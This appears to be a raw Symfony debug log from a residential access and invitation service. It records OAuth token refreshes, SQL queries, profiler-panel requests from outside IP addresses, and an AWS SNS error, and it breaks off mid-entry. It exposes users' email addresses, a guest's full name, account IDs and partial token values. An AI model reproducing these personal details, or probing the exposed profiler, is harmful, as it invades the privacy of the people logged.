[2025-12-21 02:07:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 02:13:56] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e70caf","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/e70caf/search/results?ip=66.249.75.1&limit=10&url=https%3A%2F%2Fweb.unda.co%2F","method":"GET"} []
[2025-12-21 02:13:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10&url=https%3A%2F%2Fweb.unda.co%2F","method":"GET"} []
[2025-12-21 02:17:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4490b3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4490b3","method":"GET"} []
[2025-12-21 02:17:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 02:18:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=logger","method":"GET"} []
[2025-12-21 02:18:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-21 02:19:45] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-21 02:19:45] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-21 02:19:45] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["7967d8158dd3144b86d148b136 [...]"] []
[2025-12-21 02:19:45] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 02:19:45] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"7a241f11e18487675c3efcc048 [...]","3":"2025-12-21 02:49:45","4":"","5":398,"6":"[]"} []
[2025-12-21 02:19:45] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 02:19:45] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 02:19:45] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"383ba64aa2b87196c211746ed5 [...]","3":"2026-02-19 02:19:45","4":"","5":398,"6":"[]"} []
[2025-12-21 02:19:45] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 02:19:45] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 02:19:45] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"7967d8158dd3144b86d148b136 [...]"] []
[2025-12-21 02:19:45] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 02:19:46] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 02:19:46] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 02:19:46] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 02:19:46] security.INFO: An AuthenticationException was thrown; redirecting to authentication entry point. {"exception":"[object] (Hona\\AdminBundle\\Exception\\NotValidTokenFoundException(code: 0): Expired Token at /var/repositories/hona/src/Hona/AdminBundle/Security/AdminUserProvider.php:79)"} []
[2025-12-21 02:19:46] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-21 02:20:03] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-21 02:20:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 02:20:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["7a241f11e18487675c3efcc048 [...]"] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 02:20:03] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
[2025-12-21 02:20:03] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 02:20:03] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"41568266-d3a8-4cc4-86f1-f8 [...]","2":1,"3":"2025-12-21 02:20:03","4":"2025-12-21 02:20:03","5":"Daniela","6":"Jasso","7":"366973","8":"/invitation/f5550161b8a76f [...]","9":"3","10":null,"11":null,"12":null,"13":null,"14":null,"15":274,"16":398} []
[2025-12-21 02:20:03] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.code AS code_8, t0.image_code_path AS image_code_path_9, t0.type AS type_10, t0.subtype AS subtype_11, t0.date_invitation AS date_invitation_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.event_id AS event_id_15, t0.address_id AS address_id_16, t0.user_id AS user_id_17 FROM invitation t0 WHERE t0.uuid = ? LIMIT 1 ["41568266-d3a8-4cc4-86f1-f8 [...]"] []
[2025-12-21 02:20:03] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 02:20:03] doctrine.DEBUG: INSERT INTO `interval` (uuid, status, date_created, date_modified, monday, tuesday, wednesday, thursday, friday, saturday, sunday, date_start, date_end, invitation_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"2a84a20f-0604-4608-b793-f5 [...]","2":1,"3":"2025-12-21 02:20:03","4":"2025-12-21 02:20:03","5":true,"6":true,"7":true,"8":true,"9":true,"10":true,"11":true,"12":"2025-12-20 06:00:00","13":"2026-12-21 05:59:59","14":25651} []
[2025-12-21 02:20:03] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.code AS code_8, t0.image_code_path AS image_code_path_9, t0.type AS type_10, t0.subtype AS subtype_11, t0.date_invitation AS date_invitation_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.event_id AS event_id_15, t0.address_id AS address_id_16, t0.user_id AS user_id_17 FROM invitation t0 WHERE t0.id = ? LIMIT 1 [25651] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.monday AS monday_6, t0.tuesday AS tuesday_7, t0.wednesday AS wednesday_8, t0.thursday AS thursday_9, t0.friday AS friday_10, t0.saturday AS saturday_11, t0.sunday AS sunday_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.invitation_id AS invitation_id_15 FROM `interval` t0 WHERE t0.invitation_id = ? [25651] []
[2025-12-21 02:20:03] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 02:20:03] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
[2025-12-21 02:20:03] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["7a241f11e18487675c3efcc048 [...]"] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 02:20:03] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 02:20:03] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 02:20:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 02:20:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["7a241f11e18487675c3efcc048 [...]"] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 02:20:03] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 02:20:04] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 02:22:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=212.47.64.207&limit=10","method":"GET"} []
[2025-12-21 02:22:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=212.47.64.207&limit=10","method":"GET"} []
[2025-12-21 02:22:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=request","method":"GET"} []
[2025-12-21 02:22:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-21 02:22:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37be69","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37be69","method":"GET"} []
[2025-12-21 02:22:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 02:23:27] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-21 02:23:27] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-21 02:23:27] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["85d864f7f25c6b0ead6d729463 [...]"] []
[2025-12-21 02:23:27] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 02:23:27] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"e28f9c3e6ae6f49f4a029e5d65 [...]","3":"2025-12-21 02:53:27","4":"","5":487,"6":"[]"} []
[2025-12-21 02:23:27] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 02:23:27] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 02:23:27] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"15e9b29a11c28061e50ee09d6d [...]","3":"2026-02-19 02:23:27","4":"","5":487,"6":"[]"} []
[2025-12-21 02:23:27] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 02:23:27] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 02:23:27] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"85d864f7f25c6b0ead6d729463 [...]"] []
[2025-12-21 02:23:27] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 02:23:28] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
[2025-12-21 02:23:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 02:23:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["4BCFC638-4B9F-4C04-8B1F-99 [...]",1,487] []
[2025-12-21 02:23:28] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClie (truncated...) InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClientTokenId</Code> <Message>The security token included in the request is invalid.</Message> </Error> <RequestId>5d68f987-8cf7-5e77-a2c5-9846d09726d3</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse 